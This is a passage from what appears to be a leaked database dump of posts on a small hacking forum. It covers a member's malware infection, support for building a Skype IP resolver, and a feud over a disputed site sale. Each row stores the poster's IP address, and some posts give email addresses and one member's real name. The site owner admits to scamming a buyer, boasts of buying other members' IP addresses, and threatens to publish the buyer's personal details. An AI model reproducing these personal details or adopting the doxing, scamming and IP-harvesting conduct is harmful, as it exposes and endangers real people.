(That bully)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ff4909614d7f5618f3881c9804f7fffd', '0', '0'); INSERT INTO mybb_posts VALUES('3780', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '82', 'iTzIpod', '1349621074', '@Vocm, he didn\'t state that he was mad. He was just simply asking a question. \n\nOT: I get that too. It\'s just a problem with our hosting. But please hang in there!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7bd772e8acf2e1570194f386286c7429', '0', '0'); INSERT INTO mybb_posts VALUES('3781', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '213', 'BitMonst3r', '1349621145', 'Will this be fixed soon? I start to like this forum, but these errors are annoying', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', 'd4b3492657a62604dc31be122d2a3fa0', '0', '0'); INSERT INTO mybb_posts VALUES('3783', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '243', 'Anarchy $ucks', '1349623380', 'Maybe its an exploit denial of service, ever heard of that (rofl)', '97.252.43.115', '1643916147', '0', '0', '0', '0', '1', '50c5d91d6f08a4988c2031c18ccf8901', '0', '0'); INSERT INTO mybb_posts VALUES('3784', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '1', 't3h jok3r', '1349633391', 'Everyones receiving that error. I\'m working on it, just need 2-4 days.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a8c878dccd1bd3e3a425613f4563b75a', '0', '0'); INSERT INTO mybb_posts VALUES('3785', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '1', 't3h jok3r', '1349633565', 'That would be a great idea because Skype IP resolvers are very useful and popular. I think program would be more easier to use and you won\'t need to invest if you are making it webbased.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'acf2e54cb75c337aa1c8f06d0c55e25d', '0', '0'); INSERT INTO mybb_posts VALUES('3786', '706', '3633', '4', 'RE: Supppp', '0', '199', 'Anonymous™', '1349636137', 'Welcome to L33thacking Kasual!', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '72b6850cde704a0eb9d9341990a1f396', '0', '0'); INSERT INTO mybb_posts VALUES('3787', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349636204', 'http://www.youtube.com/watch?v=RbD1EIIY7kI&feature=channel&list=UL', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '7b30b144049115563139bec832d170d5', '0', '0'); INSERT INTO mybb_posts VALUES('3788', '698', '3557', '7', 'RE: Skype group anyone?', '0', '222', 'Exposé', '1349637151', 'Itzipod didn\'t I add you already?', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '3fc18602b964e419ec9457ba45f43d56', '0', '0'); INSERT INTO mybb_posts VALUES('3789', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '222', 'Exposé', '1349637234', 'I can do a couple of mockups if u would like. ;)', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'a3a594b846618cca1cf9f51a9310d8f1', '0', '0'); INSERT INTO mybb_posts VALUES('3790', '741', '3766', '9', 'RE: 7 Videos That Will Show You How To Make Real Income Online!', '0', '53', 'sirchamp', '1349637350', 'Lol. I just saw this on elitevip.net\nThanks for posting this here.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ebacfc3582d7b084bc5d4e73d0c83c94', '0', '0'); INSERT INTO mybb_posts VALUES('3792', '743', '0', '23', 'I got a virus', '0', '82', 'iTzIpod', '1349641472', 'I\'m scared right now.. I got a virus on my laptop. I don\'t know what type it is. I just downloaded a Skype IP Resolver off of LeakForums. And forgot to run it in Sandboxie. And it didn\'t work. (It didn\'t open) After, I just tried to delete it and it didn\'t work. So I opened up my Task Manager and ended the process. And talked to my friend from school on Skype. And then it was randomly typing \"Fuck You Bitch\" and sending it to her. And I got scared so I just went and Shut Down my laptop. (I went to Start > Shut Down.\r\n\r\nAnd then when I turned it back on 5 minutes later, I opened up Notepad and deleted the Skype IP Resolver Program. And then I was randomly typing \"Hey\"\r\nAnd then it started typing \"NI GERS NIGGER NIGGER NIGGER NIGGERNIGEER NIGGER\" Etc.. I was so scared so I shut down my laptop again. \r\n\r\nWhat do I do?\r\nI don\'t know what this virus is..\r\n\r\nPlease help.\r\nMy dad will get really pissed if he finds out and all. \r\n+ My brother.. :/ Right now, I\'m running Sandboxie on my Web browser Google Chrome. And I downloaded the Skype IP Resolver from here\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=24540\r\n\r\nDon\'t download that and use it.\r\n\r\nPlease help me though. I\'m in need of assistance.\r\nI forgot to run it in Sandboxie and now I\'m fucked. \r\nI don\'t know what this virus is called and what it is and does. All I know is that I am infected and also a victim. It was typing and sending random shit. And I\'m scared as fuck.\r\n\r\nPlease help\r\n\r\nThanks\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25af7f741d48583a68b2851325c1639b', '0', '0'); INSERT INTO mybb_posts VALUES('3793', '744', '0', '19', '[Junk]Site Purchased', '0', '243', 'Anarchy $ucks', '1349642114', 'A while back, I had made an offer to purchase the site from t3h jok3r, and today they decided they\'d like to take me up on the offer. I have purchased L33thacking. \r\nI am assuming they have decided to sell the forum because of the recent server issues. In collaboration with t3h jok3r, we will be merging the site to [url=http://www.anarchyforums.net]Anarchy Forums[/url]. We will be merging all of the posts and users soon, so please be patient.\r\n\r\nWhat you will get to keep:\r\n[list]\r\n[*]Your posts, threads, and anything else you posted here.\r\n[*]Your username, signature, etc... (provided someone doesn\'t have your name on our site)\r\n[*]Your reputation.\r\n[/list]\r\n\r\nWhat you won\'t get to keep:\r\n[list]\r\n[*]Special usergroups (moderator, etc...) [Note that if you meet requirements, you may apply for usergroups on our site]\r\n[*]Posts that violate our rules, which, in most cases they won\'t.\r\n[*]A few other small things.\r\n[/list]\r\n\r\nFor the most part, I would like to respect the members that have contributed here, and do my absolute best to accommodate for any losses you may have. \r\nPlease notify me if I can improve your experience in the coming days. Additionally, I would like to thank t3h jok3r for giving us this opportunity.\r\n\r\nI know there might be some mixed opinions on this move, so I will do my best to personally address any concerns you may have.', '108.171.103.155', '1823172507', '0', '0', '0', '0', '1', '48486da6eeabe58c87da3cb57af7be36', '0', '0'); INSERT INTO mybb_posts VALUES('3794', '744', '3793', '19', 'RE: Site Purchased', '0', '243', 'Anarchy $ucks', '1349642340', 'Kay, hopefully this will be good as the original!', '97.255.20.208', '1644106960', '0', '0', '0', '0', '1', 'fd0a4ab95d8b8b7619acf40510a5a9e1', '0', '0'); INSERT INTO mybb_posts VALUES('3795', '744', '3793', '19', 'RE: Site Purchased', '0', '231', 'Rhythm', '1349643453', 'The 1 Post Squad. Good luck Anarchist! ^-^', '99.233.52.247', '1676227831', '0', '0', '0', '0', '1', 'cf1f24eb255b347c7c298376eae33443', '0', '0'); INSERT INTO mybb_posts VALUES('3796', '654', '3226', '9', 'RE: Make money typing captchas', '0', '100', '??zg???g????61', '1349643974', 'iPod there\'s a character minimum of 25, So i did three D\'s lol.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '97e0274533758e48c23c82e4eb0b711b', '0', '0'); INSERT INTO mybb_posts VALUES('3797', '743', '3792', '23', 'RE: I got a virus', '0', '100', '??zg???g????61', '1349644190', 'Well from what your describing, it seems like you caught someones RAT. I\'d PM anonymous, his signature advertises \"RAT Removal Specialist\"', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '694048851bdcae926f029b9dd3aa6239', '0', '0'); INSERT INTO mybb_posts VALUES('3798', '745', '0', '59', '[Leak] Huge Folder of Ebooks', '0', '100', '??zg???g????61', '1349645213', 'Here are a ton of paid and free Ebooks.\r\n\r\nI haven\'t tried them out yet, I will soon.\r\n\r\nhttp://www.mediafire.com/?1jl1va1qe3ei90x\r\n\r\nScreenshot\r\n\r\nhttp://gyazo.com/21f273d37e824f179be3fef902fd3394\r\n\r\nEnjoy! ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '6026be0add4f867672e0b1a9ada8099a', '0', '0'); INSERT INTO mybb_posts VALUES('3799', '744', '3793', '19', 'RE: Site Purchased', '0', '222', 'Exposé', '1349645262', 'Lol well i\'m gone. This was a very bad decision. This site has so much more activity than anarchy forums and l33thacking will be just a memory. Cya guys', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '7cf0530bac816de5999e80889baaa1ae', '0', '0'); INSERT INTO mybb_posts VALUES('3800', '744', '3793', '19', 'RE: Site Purchased', '0', '1', 't3h jok3r', '1349645375', 'WTF? L33THacking is not for sell and never would be. L33THacking was not sold.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd9b3f4c9fa07f183cfdcf0264481d657', '0', '0'); INSERT INTO mybb_posts VALUES('3801', '746', '0', '19', '[Junk]L33thacking wtf.....', '0', '222', 'Exposé', '1349645531', 'Why did you agree to sell the site to the anarchist. This is a horrible decision. And here is why...\r\n\r\n1) The name doesn\'t even have a definite meaning\r\n2) None of the members are actually active\r\n3) L33thacking has higher quality content\r\n\r\nI hope the decision wasn\'t based on just cause you guys wanted money. If it was server issues you could have purchased better hosting...\r\n\r\nCan someone please help me understand this stupid decision...', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '701cc03bae2b1c032c5dd267e83f9963', '0', '0'); INSERT INTO mybb_posts VALUES('3802', '744', '3793', '19', 'RE: Site Purchased', '0', '222', 'Exposé', '1349645579', 'Wtf is going on???????????', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'd9df2183a60ba52485a57b9c1a750228', '0', '0'); INSERT INTO mybb_posts VALUES('3803', '744', '3802', '19', 'RE: Site Purchased', '0', '243', 'Anarchy $ucks', '1349645694', '[quote=\'t3h jok3r\']\n[quote=\'The Anarchist\']\n[quote=\'t3h jok3r\']\n[quote=\'The Anarchist\']\n[quote=\'t3h jok3r\']\nI\'m done with LH, I want to sell it. Do you have Skype or MSN?\n[/quote]\n\nI do.\nEmail: Unverified@hotmail.com\n[/quote]\n\nDo you have Skype?\n[/quote]\n\nTheAnarchistAF\nI am not sure if my PMs are going through\n[/quote]\n\nNah then lets chat on MSN. I added you from erica8989@hotmail.com\n[/quote]\n\nThe rest was discussed on MSN. If the owner is reneging on their deal, I\'m afraid that\'s their issue.', '108.171.103.155', '1823172507', '0', '0', '243', '1349645832', '1', '923d6d0a6453b2ad06916cccea4b2653', '0', '1349645832'); INSERT INTO mybb_posts VALUES('3804', '744', '3793', '19', 'RE: Site Purchased', '0', '100', '??zg???g????61', '1349647510', 'Anarchist don\'t even try. This is all a lie everyone. I talked to t3h jok3r on skype.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd0596de19159a99438ecbb9b03f88a65', '0', '0'); INSERT INTO mybb_posts VALUES('3805', '744', '3804', '19', 'RE: Site Purchased', '0', '243', 'Anarchy $ucks', '1349648269', '[quote=\'iTzGRONgamer61\' pid=\'3804\' dateline=\'1349647510\']\r\nAnarchist don\'t even try. This is all a lie everyone. I talked to t3h jok3r on skype.\r\n[/quote]\r\n\r\nI\'m afraid it\'s not. If t3h jok3r can\'t keep their own deals, I\'m afraid that\'s their issue. The merger will be delayed on this. However, I can\'t see the site lasting too long given the downtime today.\r\n\r\nHere are the private messages exchanged between us.\r\n\r\n[img]http://gyazo.com/6f54520f4c3337088d33fa7e2ed92e60.png?1349646781[/img]\r\n\r\nAnd the messages from MSN:\r\n\r\n[spoiler][img]http://gyazo.com/bc109428cd60d030ef90b2bff589565e.png[/img]\r\n[img]http://gyazo.com/a1aa9e073e26a05f17d37abfc714cb65.png[/img]\r\n[img]http://gyazo.com/224b052abb165b92493cc64cbe541b7f.png?1349647000[/img]\r\n[img]http://gyazo.com/025589a8c9520f9151736399c605d0df.png?1349647050[/img][/spoiler]', '108.171.103.155', '1823172507', '0', '0', '243', '1349648493', '1', '5e774c53717ff5182f8e575cf012ed33', '0', '1349648493'); INSERT INTO mybb_posts VALUES('3806', '746', '3801', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349649119', 'We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '396b2d015c796f665abc1b141f17dbcf', '0', '0'); INSERT INTO mybb_posts VALUES('3807', '744', '3793', '19', '[Junk]Site Purchased', '0', '1', 't3h jok3r', '1349649205', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3808', '746', '3806', '19', 'RE: L33thacking wtf.....', '0', '243', 'Anarchy $ucks', '1349649265', 'It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction.\r\n\r\n\r\n[quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\']\r\nWe never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.\r\n[/quote]\r\n\r\nI\'m afraid we have nothing to do with your server issues.', '108.171.103.155', '1823172507', '0', '0', '0', '0', '1', '5260ac763a7cdb79b738c3d6b3d68e11', '0', '0'); INSERT INTO mybb_posts VALUES('3809', '747', '0', '3', 'L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349649678', 'The truth is that Anarchy forums have been DDoSing l33thacking today and advertising secretly so Anarchy forums owner once offered me to sell my website so what I did was went on with the deal and took the money he gave me and took his contact information and created a DOX. I had someone on Anarchy forums to create a DOX of their members and some of Anarchy forum Staff have been sold out to me. They have been paid to leave AF and join my forum and provide me with their members IP addresses. \n\nL33THacking was never sold and will never be sold. This is my forum and the best forum. No stink ass low class forum owner such as The Anarchist will steal may forum.\n\n[b]OPEN ANNOUNCEMENT[/b]\n\nBitch you stole my bro from LH, you DDoSed my website and got me banned by Google now since I have your DOX watch what happens. Tor browser has a lot of benefits too. I never joined your site neither I have Skype so you don\'t have any information on me.\n\nTHE PAYPAL YOU SENT MONEY TO IS MY GFS PP AND I HAVE MOVED THE MONEY ANYWAY. \n\nFUCK YOU AND ENJOY YOUR DOWNTIME BITCH!\n\n[b]IF ANY OF YOUR MEMBERS TRY TO HARM MY WEBSITE, I WILL SEND A REPORT TO YOUR ISP AND TELL THEM THAT YOU ARE INVOLVED IN HACKING ACTIVITES.[/b]', '72.231.24.165', '1223104677', '1', '0', '1', '1349649770', '1', '2da22359195ba02e01b49aa3bc60836c', '0', '1349649770'); INSERT INTO mybb_posts VALUES('3810', '746', '3808', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349649859', '[quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\']\r\nIt appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction.\r\n\r\n\r\n[quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\']\r\nWe never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.\r\n[/quote]\r\n\r\nI\'m afraid we have nothing to do with your server issues.\r\n[/quote]\r\n\r\nI have your sites member admit that your guys members have been DDoSing LH. Check your sites PM.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '35ac2bd017487ce809363998c4385abe', '0', '0'); INSERT INTO mybb_posts VALUES('3811', '746', '3810', '19', 'RE: L33thacking wtf.....', '0', '243', 'Anarchy $ucks', '1349650573', '[quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\']\n[quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\']\nIt appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction.\n\n\n[quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\']\nWe never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.\n[/quote]\n\nI\'m afraid we have nothing to do with your server issues.\n[/quote]\n\nI have your sites member admit that your guys members have been DDoSing LH. Check your sites PM.\n[/quote]\n\nAlthough I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case.\nThere doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users.', '108.171.103.155', '1823172507', '0', '0', '243', '1349650592', '1', '7ef03bf9943f363958674b99032d2449', '0', '1349650592'); INSERT INTO mybb_posts VALUES('3812', '746', '3811', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349650847', '[quote=\'The Anarchist\' pid=\'3811\' dateline=\'1349650573\']\r\n[quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\']\r\n[quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\']\r\nIt appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction.\r\n\r\n\r\n[quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\']\r\nWe never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.\r\n[/quote]\r\n\r\nI\'m afraid we have nothing to do with your server issues.\r\n[/quote]\r\n\r\nI have your sites member admit that your guys members have been DDoSing LH. Check your sites PM.\r\n[/quote]\r\n\r\nAlthough I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case.\r\nThere doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users.\r\n[/quote]\r\n\r\nOK lets just say for a minute that you had anything to do with it but how did your members find out about my website and advertise?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c5137c3234a04bbf82a0a705714aa9eb', '0', '0'); INSERT INTO mybb_posts VALUES('3813', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349650881', 'I\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account.\r\n\r\nHowever, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to.\r\n\r\nI recommend you act more professional and disable your capslock, as it is a poor representation of your site.', '108.171.103.155', '1823172507', '0', '0', '243', '1349650889', '1', 'ab4457117e84b2249228199fc30009e3', '0', '1349650889'); INSERT INTO mybb_posts VALUES('3814', '746', '3812', '19', 'RE: L33thacking wtf.....', '0', '243', 'Anarchy $ucks', '1349651064', '[quote=\'t3h jok3r\' pid=\'3812\' dateline=\'1349650847\']\n[quote=\'The Anarchist\' pid=\'3811\' dateline=\'1349650573\']\n[quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\']\n[quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\']\nIt appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction.\n\n\n[quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\']\nWe never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.\n[/quote]\n\nI\'m afraid we have nothing to do with your server issues.\n[/quote]\n\nI have your sites member admit that your guys members have been DDoSing LH. Check your sites PM.\n[/quote]\n\nAlthough I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case.\nThere doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users.\n[/quote]\n\nOK lets just say for a minute that you had anything to do with it but how did your members find out about my website and advertise?\n[/quote]\n\nIronically enough, a member of your site spammed on ours. It would only make sense. I did express negative feelings towards such methods of advertising, so it could very well be that they took that as a reason to advertise back.\nI have better things to do than bother with your site, no offense. Your site has been down all day, and I can\'t say I would waste my time.', '108.171.103.155', '1823172507', '0', '0', '243', '1349651077', '1', 'e3690a0b77e0bdf2f412daf47659a858', '0', '1349651077'); INSERT INTO mybb_posts VALUES('3815', '747', '3813', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349651201', '[quote=\'The Anarchist\' pid=\'3813\' dateline=\'1349650881\']\r\nI\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account.\r\n\r\nHowever, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to.\r\n\r\nI recommend you act more professional and disable your capslock, as it is a poor representation of your site.\r\n[/quote]\r\n\r\nExactly my site so I get to do what I want to do. I scammed because you messed with me. I won\'t do anything with you info. I will post it online then whatever happens even if I do it, I am not hold responsible because anyone can do anything with your information. All I can say is GTFO and don\'t even think of coming back to LH. Also Leakforums and darthforums owners are my friends so if you think you will fuck up my website and get away then you are wrong.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1c36f2763a9883dc2f75023e6ea19e59', '0', '0'); INSERT INTO mybb_posts VALUES('3816', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '232', 'BreShiE', '1349651284', 'Haha, this is going to be fun! Yeah man, screw anarchists\' forum, the owner\'s an idiot and doesn\'t know how to run a forum. I\'m coming over here, screw him. They\'re just full of whining idiotic trolling kids, so screw them, I\'d prefer to be here. I\'m going to get some more information on them for you. Let\'s fuck them up!', '78.149.68.187', '1318405307', '0', '0', '232', '1349651353', '1', 'ffa9fbfc0aa768e55c75baf2dc22921f', '0', '1349651353'); INSERT INTO mybb_posts VALUES('3817', '747', '3815', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349651407', '[quote=\'t3h jok3r\' pid=\'3815\' dateline=\'1349651201\']\n[quote=\'The Anarchist\' pid=\'3813\' dateline=\'1349650881\']\nI\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account.\n\nHowever, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to.\n\nI recommend you act more professional and disable your capslock, as it is a poor representation of your site.\n[/quote]\n\nExactly my site so I get to do what I want to do. I scammed because you messed with me. I won\'t do anything with you info. I will post it online then whatever happens even if I do it, I am not hold responsible because anyone can do anything with your information. All I can say is GTFO and don\'t even think of coming back to LH. Also Leakforums and darthforums owners are my friends so if you think you will fuck up my website and get away then you are wrong.\n[/quote]\n\nYou should act more professionally if you have such powerful associates, they would likely frown upon the immaturity you have shown.\n\nAs I\'ve said, you have a member\'s Paypal information, not mine. I will be pleasantly surprised if you manage to find me using his information.\n\nA site owner who scams as a means of making money is pathetic.\nI hope you look back later and choose not to do this in the future.', '108.171.103.155', '1823172507', '0', '0', '243', '1349651554', '1', 'cd2b73e2fa31e946b032c5375e95de10', '0', '1349651554'); INSERT INTO mybb_posts VALUES('3818', '747', '3817', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349651570', '[quote=\'The Anarchist\' pid=\'3817\' dateline=\'1349651407\']\n[quote=\'t3h jok3r\' pid=\'3815\' dateline=\'1349651201\']\n[quote=\'The Anarchist\' pid=\'3813\' dateline=\'1349650881\']\nI\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account.\n\nHowever, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to.\n\nI recommend you act more professional and disable your capslock, as it is a poor representation of your site.\n[/quote]\n\nExactly my site so I get to do what I want to do. I scammed because you messed with me. I won\'t do anything with you info. I will post it online then whatever happens even if I do it, I am not hold responsible because anyone can do anything with your information. All I can say is GTFO and don\'t even think of coming back to LH. Also Leakforums and darthforums owners are my friends so if you think you will fuck up my website and get away then you are wrong.\n[/quote]\n\nYou should act more professionally if you have such powerful associates.\n\nAs I\'ve said, you have a member\'s Paypal information, not mine. I will be pleasantly surprised if you manage to find me using his information.\n\nI hope you look back later and choose not to do this in the future.\n[/quote]\n\nLOL I\'m done with bedtime stories and one more thing I didn\'t not DOX the PP email.', '72.231.24.165', '1223104677', '1', '0', '1', '1349652056', '1', 'c5428d306db1268feab2dde58ad32fa8', '0', '1349652056'); INSERT INTO mybb_posts VALUES('3819', '746', '3814', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349651774', '[quote=\'The Anarchist\' pid=\'3814\' dateline=\'1349651064\']\n[quote=\'t3h jok3r\' pid=\'3812\' dateline=\'1349650847\']\n[quote=\'The Anarchist\' pid=\'3811\' dateline=\'1349650573\']\n[quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\']\n[quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\']\nIt appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction.\n\n\n\nI\'m afraid we have nothing to do with your server issues.\n[/quote]\n\nI have your sites member admit that your guys members have been DDoSing LH. Check your sites PM.\n[/quote]\n\nAlthough I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case.\nThere doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users.\n[/quote]\n\nOK lets just say for a minute that you had anything to do with it but how did your members find out about my website and advertise?\n[/quote]\n\nIronically enough, a member of your site spammed on ours. It would only make sense. I did express negative feelings towards such methods of advertising, so it could very well be that they took that as a reason to advertise back.\nI have better things to do than bother with your site, no offense. Your site has been down all day, and I can\'t say I would waste my time.\n[/quote]\n\nAnd thanks to your money I bought a VPS and as you said I have no control over my members. The more you post, the more my websites activity would increase', '72.231.24.165', '1223104677', '1', '0', '1', '1349651852', '1', '04dc60203732b44a00953844781e5bc1', '0', '1349651852'); INSERT INTO mybb_posts VALUES('3822', '749', '0', '4', 'It\'s BreShiE!', '0', '232', 'BreShiE', '1349652059', 'My name is Nathan Haines, I live in the UK and I\'m 18 years of age. I have been a web developer for around 2-3 years now, and have picked up many, many skills along the way. (coding etc...). My internet career began as I believe many do, I just used it to go and talk to friends / listen to music, but that all changed after I got expelled from school. I then got into Xbox LIVE, and became a \'no life\' for a while, I went through a stage where I couldn\'t talk about anything but my games, pretty sad, right? Then back in \'09 I learned about the \'back end\' of gaming, the gaming \'underworld\' which consists of DDoSing / hacking / cheating / scamming. I went through a bad spell and mixed with some bad people, as I have my whole life, things never change. Then mid \'10 I learned the art of webmastering. I began just running a simple Invision Power Board forum, which I again picked up many-many skills. Then early last year (2011) I began with MyBB Forums and actually buying my own domains. I haven\'t looked back since.\r\n\r\nAfter spending some time on AnarchyForums, I decided to come to this forum. The owner of that is a complete idiot and cannot run a forum. So let\'s hope this forum is much better, although it wouldn\'t be hard to top it.\r\n\r\n<3', '78.149.68.187', '1318405307', '0', '0', '0', '0', '1', '2d960f358c0c68bb245e0b79a0d4723a', '0', '0'); INSERT INTO mybb_posts VALUES('3823', '748', '3821', '19', 'RE: What the fuck is going on right now?', '0', '1', 't3h jok3r', '1349652117', 'As I said it\'s not sold and will never be sold.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ce6f72a7f9a1534daa08ee3bead00723', '0', '0'); INSERT INTO mybb_posts VALUES('3824', '746', '3801', '19', '[Junk]L33thacking wtf.....', '0', '1', 't3h jok3r', '1349652135', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3825', '748', '3821', '19', '[Junk]What the fuck is going on right now?', '0', '61', 'NXK', '1349652149', 'This thread has been junked.\n[hr]\nThis thread has been junked.\n[hr]\nThis thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '61', '1349652150', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3821', '748', '0', '19', '[Junk][Junk][Junk]What the fuck is going on right now?', '0', '61', 'NXK', '1349651963', 'I don\'t get this, Was the website sold or not. This is so confusing..\n\nI\'m not wasting my time here anymore if this was sold.', '99.253.94.204', '1677549260', '1', '0', '61', '1349652070', '1', '708fe30df7b9cb14c8f3a5d7c554fc0d', '0', '1349652070'); INSERT INTO mybb_posts VALUES('3826', '743', '3792', '23', 'RE: I got a virus', '0', '232', 'BreShiE', '1349652271', 'If you\'d like to allow me on your TeamViewer, I could remove this for you.', '78.149.68.187', '1318405307', '0', '0', '0', '0', '1', '16362a1cf80a2eea3299a12306543e83', '0', '0'); INSERT INTO mybb_posts VALUES('3827', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349653392', 'Sigh. So you\'re telling me I was accused for all of this..\n\nOh well. I\'m gone from this forum anyways.\nLaters everyone.\nGonna make my thread now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '599d53af51d18ae12741483b6b3a10a2', '0', '0'); INSERT INTO mybb_posts VALUES('3828', '750', '0', '3', 'Leaving', '0', '82', 'iTzIpod', '1349653476', 'Bye.\r\n\r\nFeel free to add me on Skype.\r\nShit happened today. Don\'t really want to discuss it.\r\n\r\nMy journey has come to an end. Good bye everyone. Farewell.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5a43ee071c6073efd3ab6d3bf266c61b', '0', '0'); INSERT INTO mybb_posts VALUES('3829', '747', '3827', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349653487', '[quote=\'iTzIpod\' pid=\'3827\' dateline=\'1349653392\']\r\nSigh. So you\'re telling me I was accused for all of this..\r\n\r\nOh well. I\'m gone from this forum anyways.\r\nLaters everyone.\r\nGonna make my thread now.\r\n[/quote]\r\n\r\n1. It doesn\'t state that you were behind this anywhere on this thread.\r\n2. Good Bye.', '72.231.24.165', '1223104677', '1', '0', '0', 